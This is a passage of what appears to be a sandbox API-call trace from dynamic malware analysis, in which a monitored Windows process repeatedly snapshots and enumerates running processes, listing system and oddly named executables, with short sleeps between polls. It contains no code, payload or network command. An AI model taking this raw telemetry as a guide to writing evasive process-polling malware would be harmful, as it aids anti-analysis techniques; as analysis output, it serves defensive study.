lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.922] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.924] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.925] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.927] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.928] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.930] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.931] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0191.933] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0191.939] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0191.941] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0191.942] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0191.944] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0191.945] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0191.947] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0191.948] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0191.953] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0191.955] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0191.956] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0191.958] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0191.960] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0192.009] Sleep (dwMilliseconds=0x64) [0192.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.032] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.105] Sleep (dwMilliseconds=0x64) [0192.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.134] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.212] Sleep (dwMilliseconds=0x64) [0192.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.230] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.539] Sleep (dwMilliseconds=0x64) [0192.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.556] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.630] Sleep (dwMilliseconds=0x64) [0192.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.649] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.753] Sleep (dwMilliseconds=0x64) [0192.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.783] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.853] Sleep (dwMilliseconds=0x64) [0192.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0192.870] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.211] Sleep (dwMilliseconds=0x64) [0193.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0193.227] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.301] Sleep (dwMilliseconds=0x64) [0193.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0193.322] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.410] Sleep (dwMilliseconds=0x64) [0193.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0193.472] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.607] Sleep (dwMilliseconds=0x64) [0193.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0193.644] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.776] Sleep (dwMilliseconds=0x64) [0193.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0193.797] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.936] Sleep (dwMilliseconds=0x64) [0193.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa00 [0193.961] Process32First (in: hSnapshot=0xa00, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.038] Sleep (dwMilliseconds=0x64) [0194.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa00 [0194.055] Process32First (in: hSnapshot=0xa00, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.134] Sleep (dwMilliseconds=0x64) [0194.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa00 [0194.148] Process32First (in: hSnapshot=0xa00, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.209] Sleep (dwMilliseconds=0x64) [0194.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.260] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.323] Sleep (dwMilliseconds=0x64) [0194.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.336] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.413] Sleep (dwMilliseconds=0x64) [0194.419] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.430] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.508] Sleep (dwMilliseconds=0x64) [0194.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.527] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.590] Sleep (dwMilliseconds=0x64) [0194.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.629] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.752] Sleep (dwMilliseconds=0x64) [0194.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.776] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.870] Sleep (dwMilliseconds=0x64) [0194.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0194.908] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.005] Sleep (dwMilliseconds=0x64) [0195.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.026] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.144] Sleep (dwMilliseconds=0x64) [0195.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.167] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.240] Sleep (dwMilliseconds=0x64) [0195.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.260] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.389] Sleep (dwMilliseconds=0x64) [0195.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.417] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.483] Sleep (dwMilliseconds=0x64) [0195.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.508] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.574] Sleep (dwMilliseconds=0x64) [0195.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.603] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.675] Sleep (dwMilliseconds=0x64) [0195.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.708] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.847] Sleep (dwMilliseconds=0x64) [0195.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0195.870] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.964] Sleep (dwMilliseconds=0x64) [0195.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.005] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.122] Sleep (dwMilliseconds=0x64) [0196.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.150] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.228] Sleep (dwMilliseconds=0x64) [0196.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.243] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.340] Sleep (dwMilliseconds=0x64) [0196.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.371] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.464] Sleep (dwMilliseconds=0x64) [0196.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.513] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.578] Sleep (dwMilliseconds=0x64) [0196.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.605] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.698] Sleep (dwMilliseconds=0x64) [0196.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.720] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.818] Sleep (dwMilliseconds=0x64) [0196.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.835] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.922] Sleep (dwMilliseconds=0x64) [0196.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0196.947] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.015] Sleep (dwMilliseconds=0x64) [0197.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.041] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.129] Sleep (dwMilliseconds=0x64) [0197.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.153] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.255] Sleep (dwMilliseconds=0x64) [0197.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.276] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.354] Sleep (dwMilliseconds=0x64) [0197.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.370] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.472] Sleep (dwMilliseconds=0x64) [0197.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.491] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.555] Sleep (dwMilliseconds=0x64) [0197.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.576] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 